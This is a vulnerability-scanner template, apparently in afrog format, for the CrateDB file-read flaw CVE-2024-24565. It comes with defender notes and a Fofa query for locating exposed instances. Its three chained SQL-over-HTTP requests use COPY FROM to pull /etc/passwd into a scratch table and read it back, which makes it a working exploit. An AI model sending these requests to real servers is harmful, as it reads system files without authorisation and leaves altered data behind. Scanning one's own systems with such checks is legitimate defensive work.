漏洞描述
Fofa: title="CrateDB"
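# Detection template for CVE-2024-24565 (CrateDB file read through COPY FROM).
# The layout looks like the afrog PoC template format (inferred from the
# id/info/set/rules/expression keys; confirm against the consuming scanner).
#
# Structure restored: the page had lost all indentation, so the block scalars
# (`description`, `body`) and the nested `rules` map could not be parsed as
# written. Scalar values below are unchanged.
#
# What the check demonstrates: an HTTP client that can POST to /_sql is able
# to make the database process read a file from the server's local filesystem
# and return its contents as table rows.
#
# Defender notes:
#   - Detection: look for POSTs to /_sql whose "stmt" contains COPY ... FROM
#     with a local filesystem path, followed by a SELECT on the same table.
#   - Mitigation: apply the vendor fix for CVE-2024-24565, and restrict who
#     can reach and authenticate to the HTTP SQL endpoint.
#
# NOTE(review): this check changes state on the target. r0 creates a table,
# r1 loads file contents into it, and no rule drops the table, so a copy of
# /etc/passwd stays in the database after the scan. Drop the table once the
# result has been confirmed.
id: CVE-2024-24565

info:
  name: CrateDB数据库任意文件读取漏洞
  author: zan8in
  severity: high
  verified: true
  # NOTE(review): this field holds only the asset-search query, not a
  # description of the flaw.
  description: |-
    Fofa: title="CrateDB"
  reference:
    - https://mp.weixin.qq.com/s/43ciyt7QFR3k3kjdfxZ7kQ
  tags: cve,cve2024,fileread
  created: 2024/02/21

# Random 8-letter table name, so repeated runs do not collide with each other
# or with an existing table.
set:
  tablename: randomLowercase(8)

rules:
  # r0: create a single-column scratch table to receive the file contents.
  r0:
    request:
      method: POST
      path: /_sql?types
      headers:
        Content-Type: application/json; charset=UTF-8
      body: |
        {"stmt":"CREATE TABLE {{tablename}}(info_leak STRING)"}
    expression: response.status == 200
  # r1: import a server-side file into the table. The file is read by the
  # database process, not by the HTTP client.
  r1:
    request:
      method: POST
      path: /_sql?types
      headers:
        Content-Type: application/json; charset=UTF-8
      body: |
        {"stmt":"COPY {{tablename}} FROM '/etc/passwd' with (format='csv', header=false)"}
    expression: response.status == 200
  # r2: read the rows back. The regex requires a passwd-style root entry in
  # the response body, so a bare 200 is not enough for a positive result.
  r2:
    request:
      method: POST
      path: /_sql?types
      headers:
        Content-Type: application/json; charset=UTF-8
      body: |
        {"stmt":"SELECT * FROM {{tablename}} limit 10"}
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)

# All three steps must succeed, in order, for the target to be reported.
expression: r0() && r1() && r2()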